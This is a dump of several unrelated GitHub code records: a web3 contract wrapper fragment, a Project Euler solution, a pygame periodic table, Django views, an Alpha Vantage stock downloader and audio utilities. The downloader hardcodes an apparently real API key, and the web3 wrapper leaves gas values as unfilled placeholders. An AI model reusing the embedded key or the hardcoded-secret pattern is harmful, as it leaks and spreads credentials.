private_key\n self.account = self.w3.eth.account.from_key(private_key)\n self.w3.eth.default_account = self.account.address\n \n def call_function(self, function_name: str, *args) -> Dict:\n function = getattr(self.contract.functions, function_name)(*args)\n return function.call(\n {\n 'from': self.w3.eth.default_account,\n 'gas': {},\n 'gasPrice': self.w3.eth.gas_price,\n 'nonce': self.w3.eth.get_transaction_count(self.w3.eth.default_account),\n }\n )\n \n def execute_transaction(self, function_name: str, *args) -> Dict:\n base_fee = self.w3.eth.gas_price * {}\n function = getattr(self.contract.functions, function_name)(*args)\n transaction = function.build_transaction({\n 'from': self.w3.eth.default_account,\n 'gas': {},\n 'gasPrice': self.w3.eth.gas_price,\n 'nonce': self.w3.eth.get_transaction_count(self.w3.eth.default_account),\n })\n signed_transaction = self.w3.eth.account.sign_transaction(\n transaction, private_key=self.private_key)\n tx_hash = self.w3.eth.send_raw_transaction(\n signed_transaction.rawTransaction)\n self.w3.eth.wait_for_transaction_receipt(tx_hash)\n receipt = self.w3.eth.get_transaction_receipt(tx_hash)\n if receipt['status'] == 0:\n raise Exception('Transaction failed')\n elif receipt['status'] == 1:\n return {\n 'txHash': tx_hash.hex(),\n 'returns': receipt,\n 'isSuccess': receipt['status'] == 1,\n }\n else:\n raise Exception('Unknown error')\n \n def execute_transaction_greet(self) -> (str):\n return self.execute_transaction('greet')\n \n def execute_transaction_sayHello(self) -> (str):\n return self.execute_transaction('sayHello')\n ","repo_name":"AbhinavMir/eclair","sub_path":"example/wrappers/HelloWorld.py","file_name":"HelloWorld.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"24076749465","text":"from math import floor, log, sqrt\nfrom itertools import 
count, islice\n\ndef is_prime(n):\n return n > 1 and all(n % i for i in islice(count(2), floor(sqrt(n)-1)))\n\ndef prime_generator(stop=10001):\n n = 2\n counter = 1\n while counter <= stop:\n if is_prime(n):\n yield n\n counter += 1\n n += 1\n\ndef find_number(div_max=20):\n result = 1\n\n for prime in prime_generator():\n a = floor(log(div_max) / log(prime))\n result = result * int(pow(prime, a))\n\n return result\n","repo_name":"pkostiukevych/project_euler","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4386592283","text":"#-*- coding: utf-8 -*-\n\ndef report(name,age,score):\n print(name,score)\n\nreport(age=10,name=\"yang\",score=90)\n\n\n\nS=\"아리랑\"\nprint(S)\nS=\"\"\"아리랑\n난리요\"\"\"\n\nprint(S)\n\na=1 #comment\nb=2\nc=4\nprint( int(3.6) )\n\nimport math\nimport math\nif c > 3:\n a=1\n b=3\n c=a+b\nelse:\n a=3\n b=4\n c=a+b\n\nprint(c)\n\nimport math\nn=math.sqrt(9.0)\nprint(n )\n\nx=True\ny=False\nif x and y:\n print(\"no\")\nelse:\n print(\"yes\")\n\nmember=[1,2,3]\nmem=3 in member\nprint(mem)\nprint(4 in member)\n\n","repo_name":"jyyang-sisul/learnAjax","sub_path":"pythonStudy/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73840558233","text":"#!/usr/bin/env python\nimport sys; sys.path[:0] = [\"../..\"]\n\nimport math\nfrom pyx import *\n\ndef drawexample(canvas, corner, linealign):\n r = 1.5\n if corner:\n canvas.stroke(path.path(path.arc(5, 5, r, 0, 360)))\n else:\n canvas.stroke(path.path(path.arc(5.5, 5+math.sqrt(3)/6, r, 0, 360)))\n phi = 0\n while phi < 2 * math.pi + 1e-10:\n if corner:\n b = box.polygon(center=(5, 5), corners=((5, 5), (6, 5), (5.5, 5+math.sqrt(3)/2)))\n else:\n b = box.polygon(center=(5.5, 5+math.sqrt(3)/6), corners=((5, 5), (6, 5), (5.5, 5+math.sqrt(3)/2)))\n if linealign:\n b.linealign(r, math.cos(phi), math.sin(phi))\n else:\n b.circlealign(r, math.cos(phi), math.sin(phi))\n if round(phi / math.pi * 2 * 100) % 100:\n canvas.stroke(b.path(centerradius=0.05))\n else:\n canvas.stroke(b.path(centerradius=0.05), [color.rgb.red])\n phi += math.pi / 50\n\nc = canvas.canvas()\nsc = c.insert(canvas.canvas([trafo.translate(0, 6)]))\ndrawexample(sc, 0, 0)\nsc = c.insert(canvas.canvas([trafo.translate(6, 6)]))\ndrawexample(sc, 0, 1)\nsc = c.insert(canvas.canvas([trafo.translate(0, 0)]))\ndrawexample(sc, 1, 0)\nsc = c.insert(canvas.canvas([trafo.translate(6, 0)]))\ndrawexample(sc, 1, 1)\nc.writeEPSfile(\"test_box\", page_paperformat=document.paperformat.A4)\nc.writePDFfile(\"test_box\", page_paperformat=document.paperformat.A4)\nc.writeSVGfile(\"test_box\", page_paperformat=document.paperformat.A4)\n\n","repo_name":"pyx-project/pyx","sub_path":"test/functional/test_box.py","file_name":"test_box.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"5"} +{"seq_id":"70907213271","text":"from UserInterface import UserInterface\n\nclass InterfaceRequest:\n\t\"\"\"Object representing a message passed between Controller and UserInterface\n\t\n\t~~~~~~~~~~~~~~~~~~~~~\n\n\tTo use, ensure that you've run these imports:\n\tfrom InterfaceRequest import InterfaceRequest\n\tfrom UserInterface import UserInterface\n\t\n\tTo create, use the relevant factory method. 
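# Note on find_number() in the 5.py record above: each prime p <= div_max is
# raised to floor(log(div_max)/log(p)), the largest power of p not exceeding
# div_max, so the product is lcm(1..div_max). For div_max = 20 that is
# 2**4 * 3**2 * 5 * 7 * 11 * 13 * 17 * 19 == 232792560. The loop walks all
# 10001 primes of prime_generator(); once p > div_max the exponent a is 0 and
# it only multiplies by 1, so breaking when a == 0 would be equivalent.
# A standard-library cross-check (gcd-based, no primes needed):
from functools import reduce
from math import gcd

def lcm_range(n: int) -> int:
    # fold lcm(a, b) = a * b // gcd(a, b) over 1..n
    return reduce(lambda a, b: a * b // gcd(a, b), range(1, n + 1), 1)

assert lcm_range(20) == 232792560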
Types of InterfaceRequests and their fields are\n\tgetLIST_DISPLAY(title, list_items, option_string, [aux])\n\t\ttitle: the title of the page overall\n\t\tlist_items: the list of items in the format (item title, item desc)\n\t\taux: auxiliary field for whatever you like, displayed near bottom\n\t\toption_string: available options to display for this page\n\t\tsingle_input: the response from the UI will be placed here\n\tgetFORM_DISPLAY(title, fields, [aux]):\n\t\ttitle: the title of the form overall\n\t\tfields: 'questions' to pose to the user of form (question/field name, expected type)\n\t\taux: auxiliary field for whatever you like, displayed near bottom\n\t\tinputs: list of inputs given, matching order of 'fields'\n\tgetITEM_DISPLAY(title, list_items, option_string, [aux]):\n\t\ttitle: the title of the page overall\n\t\tlist_items: the list of items in format (item title, item desc)\n\t\taux: auxiliary field for whatever you like, displayed near bottom\n\t\toption_string: available options to display for this page\n\t\tsingle_input: the response from the UI will be placed here\n\tgetCONFIRM_DISPLAY(title, msg, [aux]):\n\t\ttitle: the title of the confirmation dialog\n\t\tmsg: the message to display with the confirmation\n\t\taux: auxiliary field for whatever you like, displayed near bottom\n\t\tresponse: the response from the UI will be placed here\n\n\tDon't attempt to create your own InterfaceRequest(), as these methods will ensure they have the right\n\tfields!\n\t\n\t~~~~~~~~~~~~~~~~~~~~~\n\t\n\tOnce you have created your object, you may modify it if needed through the getField and setField\n\tmethods. These methods ensure that you only access and mutate fields that are actually present in\n\tthat object. For example, attempting to set the 'inputs' field of a LIST_DISPLAY will result in a TypeError,\n\tas LIST_DISPLAYS have only a 'single_input', not an 'inputs' list.\n\n\t~~~~~~~~~~~~~~~~~~~~~\n\n\tNow that your InterfaceRequest is set up, you can display it and get the response back with a statement like:\n\tmy_list_request = UserInterface.display(my_list_request)\n\n\tAssuming the object is properly set up, UserInterface will handle it and pass back the object with the user's\n\tresponse in the relevant field, which can be accessed like so:\n\tuser_response = my_list_request.getField('single_input')\n\t\n\t\"\"\"\n\tdef __init__(self, my_dict):\n\t\tself.d = my_dict\n\n\tdef getField(self, field):\n\t\tself._checkField(field)\n\t\treturn self.d[field]\n\n\tdef setField(self, field, value):\n\t\tself._checkField(field)\n\t\tself.d[field] = value\n\n\tdef _checkField(self, field):\n\t\tif field not in self.d:\n\t\t\traise TypeError(\"field '\" + str(field) + \"' not in request\")\n\n\t@staticmethod\n\tdef getLIST_DISPLAY(title, list_items, option_string, aux=None):\n\t\tmy_dict = {}\n\t\tmy_dict['type'] = 'LIST_DISPLAY'\n\t\tmy_dict['title'] = title\n\t\tmy_dict['list_items'] = list_items\n\t\tmy_dict['aux'] = aux\n\t\tmy_dict['option_string'] = option_string\n\t\tmy_dict['single_input'] = ''\n\t\treturn InterfaceRequest(my_dict)\n\n\t@staticmethod\n\tdef getFORM_DISPLAY(title, fields, aux=None):\n\t\tmy_dict = {}\n\t\tmy_dict['type'] = 'FORM_DISPLAY'\n\t\tmy_dict['title'] = title\n\t\tmy_dict['fields'] = fields\n\t\tmy_dict['aux'] = aux\n\t\tmy_dict['inputs'] = []\n\t\treturn InterfaceRequest(my_dict)\n\n\t@staticmethod\n\tdef getCONFIRM_DISPLAY(title, msg, aux=None):\n\t\tmy_dict = {}\n\t\tmy_dict['type'] = 'CONFIRM_DISPLAY'\n\t\tmy_dict['title'] = title\n\t\tmy_dict['msg'] = 
msg\n\t\tmy_dict['aux'] = aux\n\t\tmy_dict['response'] = ''\n\t\treturn InterfaceRequest(my_dict)\n\n\t@staticmethod\n\tdef getITEM_DISPLAY(title, list_items, option_string, aux=None):\n\t\toutput = InterfaceRequest.getLIST_DISPLAY(title, list_items, option_string, aux)\n\t\toutput.setField('type', 'ITEM_DISPLAY')\n\t\treturn output\n\nif __name__ == '__main__':\n\tir = InterfaceRequest.getLIST_DISPLAY('Search results',\n\t\t[('Bananas ea', '$1.00'), ('Bananas kg', '$10.00')],\n\t\t'X to exit, C to continue',\n\t\t'Total 2 items')\n\tir = UserInterface.display(ir)\n\tprint('You said,', ir.getField('single_input'))\n\tir2 = InterfaceRequest.getCONFIRM_DISPLAY('Confirm whateer', 'Please confirm that you wish to proceed with the transaction')\n\tir2 = UserInterface.display(ir2)\n\tprint('You said,', ir2.getField('response'))\n\tir3 = InterfaceRequest.getFORM_DISPLAY('Registration: Please enter your details', [('Name', 'string'), ('Age', 'int')])\n\tir3 = UserInterface.display(ir3)\n\tprint('Responses were', ir3.getField('inputs'))\n\tir4 = InterfaceRequest.getITEM_DISPLAY('Customer', [('Name', 'Jamie Hoffmann'), ('Age', 23), ('Course', 'MIT')], 'X to exit, E to edit')\n\tir4 = UserInterface.display(ir4)\n\tprint('You said,', ir4.getField('single_input'))\n","repo_name":"Frogulis/5136-shop","sub_path":"old-classes/InterfaceRequest.py","file_name":"InterfaceRequest.py","file_ext":"py","file_size_in_byte":4905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"18522367338","text":"#Importation des bibliothèques :\r\nimport pygame\r\nfrom pygame.locals import *\r\nfrom data import *\r\n\r\n#Initialisation de pygame :\r\npygame.init()\r\npygame.display.set_caption(\"Grégory Projet Tableau Périodique\")\r\nsurface = pygame.display.set_mode((1050,625))\r\nhorloge = pygame.time.Clock()\r\n\r\n#Définition de la Police d'écriture pour plusieurs éléments:\r\nfont_element = pygame.font.SysFont('Arial', 20)\r\nfont_titre = pygame.font.SysFont('\"Volter.ttf\"', 40)\r\nfont_config = pygame.font.SysFont('Arial', 20)\r\nfont_legende = pygame.font.SysFont('Arial', 10)\r\nfont_masse = pygame.font.SysFont('Arial', 10)\r\nfont_nomcomplet = pygame.font.SysFont('Volter.ttf', 14)\r\n\r\n#Chargement de la musique de fond :\r\npygame.mixer.init()\r\npygame.mixer.music.load(\"Musique_De_Fond.mp3\")\r\npygame.mixer.music.play(loops=-1)\r\n\r\n#Couleur de fond :\r\nsurface.fill((185,248,248))\r\n\r\n# Création des légendes des groupes chimiques :\r\nliste_couleur = [(176,224,230),(187,210,225),(176,196,222),(173,216,230),(135,206,250),(135,206,235),(128,208,208),(95,158,160),(0,191,255),(119,181,254),(100,149,237)]\r\nliste_legende = [[10,570,80,20],[10,540,80,20],[10,510,80,20],[10,480,80,20],[10,450,80,20],[100,570,80,20],[100,540,80,20],[100,510,80,20],[100,480,80,20],[100,450,80,20],[190,440,80,20]]\r\nliste_groupe = [\"Diatomic nonmetal\",\"Noble gas\",\"Alkaline earth metal\",\"Polyatomic nonmetal\",\"Metalloid\",\"Alkali metal\",\"Transition metal\",\"Poor metal\",\"Transition metal\",\"Lanthanide\",\"Actinide\"]\r\nfor i in range(len(liste_couleur)):\r\n leg = pygame.draw.rect(surface,liste_couleur[i],liste_legende[i])\r\n texte = font_legende.render(liste_groupe[i],1,(255,0,0))\r\n surface.blit(texte,leg)\r\n\r\n#Ecriture du titre de mon tableau périodique\r\ntitre = 0\r\ntitre = font_titre.render(\"Tableau périodique TP Chimie Grégory\",1,(0,0,0))\r\nsurface.blit(titre, (300, 25))\r\n\r\n# Variable utile\r\ndata = 0\r\nw =1272\r\nc = 53\r\n\r\n#Les 
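# Note on the legend-drawing loop in the pygame record above: liste_couleur,
# liste_legende and liste_groupe are three parallel lists indexed by the same
# i; zip() expresses the pairing without index arithmetic. A hedged refactor
# sketch (draw_legend and entries are illustrative names, not from the record):
import pygame

def draw_legend(surface, font, entries):
    # entries: iterable of (rgb_colour, rect, label) triples
    for colour, rect, label in entries:
        box = pygame.draw.rect(surface, colour, rect)
        surface.blit(font.render(label, 1, (255, 0, 0)), box)

# usage: draw_legend(surface, font_legende,
#                    zip(liste_couleur, liste_legende, liste_groupe))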
différents groupes de métaux :\r\ndef Groupes(x):\r\n for i in range(len(liste_groupe)):\r\n if data1[x][5] == liste_groupe[i]:\r\n return liste_couleur[i]\r\n return (230,230,250)\r\n\r\n# écriture des éléments chimiques :\r\ndef texte(x,rect):\r\n if data1[x][0] == \"La-Lu\" or data1[x][0] == \"Ac-Lr\":\r\n texte = font_element.render(\" \"+str(data1[x][0]),1,(255,0,0))\r\n surface.blit(texte,rect)\r\n else:\r\n texte = font_element.render(\" \"+str(data1[x][0]),1,(255,0,0))\r\n surface.blit(texte,rect)\r\n#écriture \r\ndef masse_atomique(x,y,i):\r\n titre = font_masse.render(data1[i][2],1,(0,0,0))\r\n surface.blit(titre,(x, y))\r\n#Nom Complet Cliquer\r\ndef nom_element(i):\r\n titre = font_nomcomplet.render(data1[i][1],1,(0,0,0))\r\n surface.blit(titre, (370, 85))\r\n\r\n#Ecriture config\r\ndef config(i):\r\n pygame.draw.rect(surface,(185,248,248),[353,70,200,90])\r\n config = font_config.render(str(data1[i][6]),1,(0,0,0))\r\n surface.blit(config,(370,100))\r\n config = font_masse.render(str(data1[i][2]),1,(0,0,0))\r\n surface.blit(config,(370,140))\r\n\r\n#Boucle savoir un élément chimique\r\ndef savoir_element(i): \r\n config(i)\r\n rectangle = pygame.draw.rect(surface,Groupes(i),[300,100,53,53],border_radius =3)\r\n texte(i,rectangle)\r\n nom_element(i)\r\n\r\ndef Savoir_Quelle_Element(rectangle1,mouse):\r\n if rectangle1 == True:\r\n if mouse[1] < 106 and mouse[0] < 83:\r\n i = 0\r\n savoir_element(i)\r\n elif mouse[1] < 106 and mouse[0] > 931:\r\n i = 1\r\n savoir_element(i)\r\n elif mouse[1] < 159 and mouse[0] < 136:\r\n i = ((mouse[0]-30)//53) + 2\r\n i+= 2\r\n savoir_element(i)\r\n elif mouse[1] < 159 and mouse[0] > 666:\r\n i = ((mouse[0]-30)//53 - 10)\r\n i += 2\r\n savoir_element(i)\r\n elif mouse[1] < 212 and mouse[0] < 136:\r\n i = ((mouse[0]-30)//53) + 10\r\n i += 10\r\n savoir_element(i)\r\n elif mouse[1] < 212 and mouse[0] > 666:\r\n i = ((mouse[0]-30)//53)\r\n savoir_element(i)\r\n elif mouse[1] > 212 and mouse[1] < 265:\r\n i = (mouse[0]-30)//53 + 18\r\n savoir_element(i)\r\n elif mouse[1] > 265 and mouse[1] < 318:\r\n i = ((mouse[0]-30)//53) + 36\r\n savoir_element(i)\r\n elif mouse[1] > 318 and mouse[1] < 371:\r\n i = ((mouse[0]-30)//53) + 54\r\n savoir_element(i)\r\n elif mouse[1] > 371 and mouse[1] < 424 and mouse[0] < 666:\r\n i = ((mouse[0]-30)//53) + 72\r\n savoir_element(i)\r\n else:\r\n if mouse[1] > 477 and mouse[1] < 530 and mouse[0] > 189:\r\n i = ((mouse[0]-30)//53 - 3) + 84\r\n savoir_element(i)\r\n if mouse[1] > 530 and mouse[1] < 583 and mouse[0] > 189:\r\n i = ((mouse[0]-30)//53 - 3) + 99\r\n savoir_element(i)\r\n\r\n#Création des cases :\r\ndef aide_creation_case(i,j):\r\n global data,a\r\n rectangle = pygame.draw.rect(surface,Groupes(data),[(i*c)+30,j*c, c, c],0,border_radius =3)\r\n x = i*c + 30\r\n y = j*c + 40\r\n masse_atomique(x,y,a)\r\n texte(data,rectangle)\r\n a += 1\r\n data += 1\r\na = 0\r\nfor j in range (0,13):\r\n for i in range(0,18):\r\n if data > 113:\r\n break\r\n if j == 1 and (i <1 or i >16 ) :\r\n aide_creation_case(i,j)\r\n elif j == 2 and (i<2 or i >11):\r\n aide_creation_case(i,j)\r\n elif j == 3 and (i<2 or i >11):\r\n aide_creation_case(i,j)\r\n elif (j>3 and j<7):\r\n aide_creation_case(i,j)\r\n elif j == 7 and i < 12:\r\n aide_creation_case(i,j)\r\n elif j == 9 and (i>2):\r\n aide_creation_case(i,j)\r\n elif j == 10 and (i>2):\r\n aide_creation_case(i,j)\r\n\r\n# Cliquer et afficher les infos en continue\r\nrun = True\r\nwhile run:\r\n mouse = pygame.mouse.get_pos()\r\n for event in pygame.event.get():\r\n if event.type == 
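# Note on Savoir_Quelle_Element above: every branch decodes the clicked cell
# with the same arithmetic, since the grid starts at x = 30 and each cell is
# c = 53 px square:
#     col = (mouse_x - 30) // 53        e.g. (200 - 30) // 53 == 3
# so the if/elif ladder could be replaced by one helper plus a
# (row, col) -> element-index table. Hedged sketch, offsets taken from the
# drawing code in the record:
def cell_from_mouse(mouse, x_offset=30, cell=53):
    """Return (row, col) of the clicked grid cell."""
    return mouse[1] // cell, (mouse[0] - x_offset) // cell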
pygame.QUIT:\r\n run = False\r\n elif pygame.mouse.get_pressed()[0]:\r\n detection = pygame.draw.rect(surface,(185,248,248),[30,53,954,371],1)\r\n if pygame.Rect.collidepoint(detection,mouse):\r\n rectangle1 = True\r\n Savoir_Quelle_Element(rectangle1,mouse)\r\n \r\n #Si le Deuxième bloc d'éléments est cliqué:\r\n detection = pygame.draw.rect(surface,(185,248,248),[189,477,795,106],1)\r\n if pygame.Rect.collidepoint(detection,mouse):\r\n rectangle1 = False\r\n Savoir_Quelle_Element(rectangle1,mouse)\r\n pygame.display.update()\r\n\r\npygame.quit()","repo_name":"GregoryDuporge/TableauPeriodique","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"25826489366","text":"\nfrom django.shortcuts import render\nfrom django import forms\nfrom .models import ic,choice\nfrom django.db import IntegrityError\nimport os\nfrom web.settings import BASE_DIR\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse\n#from reportlab.pdfgen import canvas\n\n# Create your views here.\n\ndef index(request):\n dic=[{'dbname':'Datasheets','url':'dsshow'},\n {'dbname':'Papers','url':'index'}]\n return render(request,'ds_index.html',{'list':dic})\n\nclass DSForm(forms.Form):\n mypn= forms.CharField()\n value= forms.CharField()\n type=forms.ChoiceField(choices=choice,required=False)\n description=forms.CharField()\n venderpn =forms.CharField(required=False)\n datasheet = forms.FileField(required=False)\n refdesign = forms.URLField(required=False)\n refcode = forms.FileField(required=False)\n refsch = forms.FileField(required=False)\n\n\n@login_required()\ndef dsupload(request):\n if request.method=='POST':\n form=DSForm(request.POST,request.FILES)\n if form.is_valid():\n cd=form.cleaned_data\n ic1=ic(mypn=cd['mypn'],value=cd['value'],\n type=cd['type'],description=cd['description'],venderpn=cd['venderpn'],\n datasheet=cd['datasheet'],refdesign=cd['refdesign'],refcode=cd['refcode'],\n refsch=cd['refsch'])\n\n try:\n ic1.save()\n except IntegrityError:\n path=os.path.join(BASE_DIR, \"media/datasheet/\")\n file=path+str(cd['datasheet'])\n os.remove(file)\n return render(request, 'ds_upload.html', {'form': form,'error_mypn':'Duplicated!','data':form.data})\n\n return render(request,\"ds_sucess.html\")\n\n\n else:\n form = DSForm(\n initial={'subject': 'I love your site!'})\n return render(request, 'ds_upload.html', {'form':form,})\ndef dsshow(request):\n a=ic.objects.all()\n result=[]\n for i in a:\n type=choice[int(i.type)][1]\n new={'mypn':i.mypn,'value':i.value,'type':type,'description':i.description,\n 'venderpn':i.venderpn,'datasheet':i.datasheet,'refdesign':i.refdesign,'refcode':i.refcode,\n 'refsch':i.refsch,'time':i.time}\n result.append(new)\n #return HttpResponse('ok')\n return render(request, 'ds_show.html', {'result':result})\n\n@login_required()\ndef dschange(request,mypn):\n ic1 = ic.objects.filter(mypn=mypn)\n lastds=ic1[0].datasheet\n if request.method == 'POST':\n ic1.delete()\n form = DSForm(request.POST, request.FILES)\n if form.is_valid():\n cd = form.cleaned_data\n if not cd['datasheet']:\n cd['datasheet']=lastds\n else:\n path = os.path.join(BASE_DIR, \"media/\")\n file = path + str(lastds)\n os.remove(file)\n ic1 = ic(mypn=cd['mypn'], value=cd['value'],\n type=cd['type'], description=cd['description'], venderpn=cd['venderpn'],\n datasheet=cd['datasheet'], refdesign=cd['refdesign'], refcode=cd['refcode'],\n 
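# Note on the IntegrityError handling in the Django views above: dsupload()
# rebuilds the uploaded file's path by concatenating BASE_DIR with
# 'media/datasheet/'. Django's FieldFile already resolves its own storage
# path against MEDIA_ROOT, so the cleanup can lean on that instead. Hedged
# sketch, assuming the same `ic` model with its `datasheet` FileField:
import os
from django.db import IntegrityError

def save_or_cleanup(instance) -> bool:
    try:
        instance.save()
        return True
    except IntegrityError:
        if instance.datasheet:
            os.remove(instance.datasheet.path)  # FieldFile.path, not BASE_DIR + str
        return False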
refsch=cd['refsch'])\n\n            try:\n                ic1.save()\n            except IntegrityError:\n                return render(request, 'ds_change.html', {'form': form, 'error': 'Duplicated!', 'data': form.data})\n            return render(request, \"ds_sucess.html\")\n    else:\n\n        form = DSForm(\n            initial={'subject': 'I love your site!'})\n        for i in ic1:\n            data = {'mypn': i.mypn, 'value': i.value, 'type': i.type, 'description': i.description,\n                    'venderpn': i.venderpn, 'datasheet': i.datasheet, 'refdesign': i.refdesign, 'refcode': i.refcode,\n                    'refsch': i.refsch,}\n\n        return render(request, 'ds_change.html', {'form': form, 'data': data})\n","repo_name":"zengfu/web_django","sub_path":"ds/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} {"seq_id":"12256502014","text":"import argparse\n\n\ndef prepare_args() -> argparse.Namespace:\n    \"\"\"\n    Prepares and parses the command-line arguments.\n\n    :return: argparse.Namespace\n        An object containing the values of the command-line arguments.\n    \"\"\"\n    arg_parser = argparse.ArgumentParser(\n        prog='tracert-as',\n        description='A tool for '\n    )\n    arg_parser.add_argument('hostname', type=str, help=\"Hostname to trace\")\n    arg_parser.add_argument(\"--ttl\", type=int, help=\"Max hops count\",\n                            default=25)\n\n    return arg_parser.parse_args()\n","repo_name":"XamaX8008/tracert-as","sub_path":"services/prepare_args.py","file_name":"prepare_args.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} {"seq_id":"25110841771","text":"import datetime as dt\nimport json\nimport os\nimport urllib.request\n\nimport pandas as pd\n\n# Please get your own FREE api key on https://www.alphavantage.co/support/#api-key\napi_key = '8H5AO0K6RF3VZPLT'\n\n\ndef mkdir(path):\n    path = path.strip()\n    exist = os.path.exists(path)\n    if not exist:\n        os.makedirs(path)\n        print('Folder: \"{}\" Successfully Built'.format(path))\n        return True\n    else:\n        print('Folder: \"{}\" Already Exist'.format(path))\n        return False\n\n\ndef get_stock_prices_us(ticker):\n    ticker = ticker.upper()\n    url_string = \"https://www.alphavantage.co/query?function=TIME_SERIES_DAILY&symbol=%s&outputsize=full&apikey=%s\" % (\n        ticker, api_key)\n\n    # Create a folder to save the downloaded data\n    mkpath = \"data\"\n    mkdir(mkpath)\n    # Save data to this directory\n    file_to_save = 'data/us_market-{}.csv'.format(ticker)\n\n    # To check if that ticker is already downloaded to local\n    if not os.path.exists(file_to_save):\n        print('Downloading Data of {}...'.format(ticker))\n        with urllib.request.urlopen(url_string) as url:\n            data = json.loads(url.read().decode())\n            data = data['Time Series (Daily)']\n            df = pd.DataFrame(columns=['Date', 'Low', 'High', 'Close', 'Open'])\n            for k, v in data.items():\n                date = dt.datetime.strptime(k, '%Y-%m-%d')\n                data_row = [date.date(), float(v['3. low']), float(v['2. high']),\n                            float(v['4. close']), float(v['1. open'])]\n                df.loc[-1, :] = data_row\n                df.index = df.index + 1\n            print('Data saved to : %s' % file_to_save)\n            df.to_csv(file_to_save, index=False)\n\n    else:\n        print('File already exists. 
Loading data from local...')\n df = pd.read_csv(file_to_save)\n\n return df\n\n\nif __name__ == '__main__':\n get_stock_prices_us('AAL')\n","repo_name":"pisaller/Time-Series_by_LSTM","sub_path":"core/readData_US.py","file_name":"readData_US.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"4914501995","text":"def timeRepr(*seconds, joint=\", \"):\n res = []\n for p in seconds:\n mins = p // 60\n hours = mins // 60\n remainSeconds = p - mins * 60\n mins = mins - hours * 60\n res.append(f\"{hours}:{mins}:{remainSeconds}\")\n if(len(seconds) == 1):\n return res[0]\n # return res\n return joint.join(res)\n\ndef average(iterable):\n s = 0\n l = 0\n for x in iterable:\n s += x\n l += 1\n return s / l # TODO: raises exception if length is 0\n\ndef groupclosest(valuesList, tolerance=8):\n #? 1. We may make this function by clustering points using machine learning kmeans algo\n #? 2. We want to use variance of every group, the variance give info about the rate of speaking ==> sound should have high variance\n groups = []\n valuesList = sorted(valuesList)[::-1]\n basei = 0\n for i, val in enumerate(valuesList):\n if (abs(val[0] - valuesList[basei][0]) > tolerance):\n newGroup = valuesList[basei:i]\n newGroup = sorted(newGroup, key=lambda x: x[1]) # sort over the group over item itself\n # print(\"newGroup\", newGroup)\n # groups.append(valuesList[basei:i])\n groups.append(newGroup)\n basei = i\n lastGroup = valuesList[basei:len(valuesList)]\n lastGroup = sorted(lastGroup, key=lambda x: x[1])\n groups.append(lastGroup)\n return groups\n\ndef fileExt(path):\n ext = path.split(\".\")[-1]\n if(ext): return ext.upper()\n return None\n\ndef replaceExt(path, newExt):\n return path.replace(\".\" + fileExt(path), \".\" + newExt)\n\nimport wave\nimport pydub\n\nimport gc\ndef readWaveFile(path, start = 0, end = None, sequential=True):\n '''\n sequential: default to true, read the file sequentially and return bytearray to be editable to add silence or any sound without copying\n if false, that will be read entirely at one read and the object returned in bytes type\n '''\n # read data\n wav = wave.open(path, 'rb')\n nchannels, sampwidth, framerate, nframes, *_ = wav.getparams()\n epos = end * framerate if end != None else nframes\n spos = start * framerate\n wav.setpos(spos)\n duration = (epos - spos)\n\n def readSequentially(spos, epos):\n print(\"readSequentially\", spos, epos, framerate)\n maxOneRead = 5 * 60 * framerate\n res = bytearray()\n remained = duration\n while (spos < epos): #? should be <=, or <\n print(spos)\n wav.setpos(spos) #? 
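# Two notes on the records above (hedged sketches, names are illustrative):
#
# 1) get_stock_prices_us() grows the frame with df.loc[-1] plus an index
#    shift, one row per day; collecting the rows first and building the
#    frame once is simpler and much faster:
import datetime as dt
import pandas as pd

def frame_from_alpha_vantage(daily: dict) -> pd.DataFrame:
    rows = [(dt.datetime.strptime(k, '%Y-%m-%d').date(),
             float(v['3. low']), float(v['2. high']),
             float(v['4. close']), float(v['1. open']))
            for k, v in daily.items()]
    return pd.DataFrame(rows, columns=['Date', 'Low', 'High', 'Close', 'Open'])

# 2) timeRepr() in utils.py does not zero-pad, so timeRepr(3661) == '1:1:1';
#    divmod plus a :02d format spec gives the usual '1:01:01':
def time_repr(seconds: int) -> str:
    mins, secs = divmod(seconds, 60)
    hours, mins = divmod(mins, 60)
    return f"{hours}:{mins:02d}:{secs:02d}"

assert time_repr(3661) == "1:01:01"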
can we delete this line\n data = wav.readframes(min(maxOneRead, remained) )\n data = bytearray(data)\n gc.collect()\n remained -= maxOneRead\n res.extend(data)\n spos += maxOneRead\n return res\n data = readSequentially(spos, epos) if sequential else wav.readframes(duration)\n wav.close()\n \n # move to audio segment\n audio = pydub.AudioSegment.silent(duration=0, frame_rate=framerate)\n audio._data = bytearray(data)\n audio.sample_width = sampwidth\n audio.frame_rate = framerate\n audio.channels = nchannels\n audio.frame_width = audio.channels * audio.sample_width\n return audio\n\ndef incDbfs(obj):\n lenObj = len(obj)\n if (lenObj < 1000 * 9 * 60):\n return obj.dBFS\n every = 2 * 60 * 1000\n currentOffset = 0\n sumall = 0\n while currentOffset < lenObj:\n seg = obj[currentOffset:every]\n sumall += seg.dBFS\n currentOffset += every\ntry:\n from audio_metadata import load as fileInfo\n getFileLength = lambda path: ('duration', fileInfo(path)[\"streaminfo\"][\"duration\"])\nexcept:\n from os import stat as fileInfo\n getFileLength = lambda p: ('size', fileInfo(p).st_size)\n\nfrom os.path import getsize as getFileSize\n\nfrom math import ceil\ndef 